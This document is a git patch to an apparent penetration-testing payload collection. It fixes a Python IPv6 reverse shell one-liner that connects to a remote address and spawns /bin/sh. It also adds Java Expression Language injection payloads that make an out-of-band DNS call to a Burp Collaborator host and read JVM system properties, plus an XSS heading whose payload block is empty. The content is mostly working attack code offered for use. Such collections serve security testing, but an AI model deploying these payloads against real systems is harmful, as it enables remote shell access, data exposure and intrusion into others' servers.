From 9bde75b32d58f6f0e50330ae39b39e7739ec4aa4 Mon Sep 17 00:00:00 2001
From: Jeffrey Cap
Date: Mon, 23 Aug 2021 14:41:40 -0500
Subject: [PATCH] Expression Language Injection One-Liners; XSS Payload; Fixed Linux Python IPv6 Reverse Shell Payload
---
 Methodology and Resources/Reverse Shell Cheatsheet.md | 2 +-
 Server Side Template Injection/README.md | 10 ++++++++++
 XSS Injection/README.md | 6 ++++++
 3 files changed, 17 insertions(+), 1 deletion(-)
diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index 4dc4f2a..3b047c1 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -150,7 +150,7 @@ python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty")
 IPv6 (No Spaces, Shortened)
 ```python
-python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),,2);p("/bin/sh")'
+python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
 ```
 Windows only
diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 37772b7..75f2441 100644
--- a/Server Side Template Injection/README.md
+++ b/Server Side Template Injection/README.md
@@ -149,6 +149,16 @@ ${1+1} #{1+1}
 ```
+### Expression Language EL - One-Liner injections not including code execution
+
+```java
+// DNS Lookup
+${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","h3l9e5soi0090naz81tmq5ztaaaaaa.burpcollaborator.net")}
+
+// JVM System Property Lookup (ex: java.class.path)
+${"".getClass().forName("java.lang.System").getDeclaredMethod("getProperty","".getClass()).invoke("","java.class.path")}
+```
+
 ### Expression Language EL - Code Execution
diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 684adcd..6085179 100644
--- a/XSS Injection/README.md
+++ b/XSS Injection/README.md
@@ -230,6 +230,12 @@ e.g: 14.rs/#alert(document.domain)
 Use CTRL+SHIFT+X to trigger the onclick event
 ```
+### XSS when payload is reflected capitalized
+
+```javascript
+
+```
+
 ### DOM based XSS
 Based on a DOM XSS sink.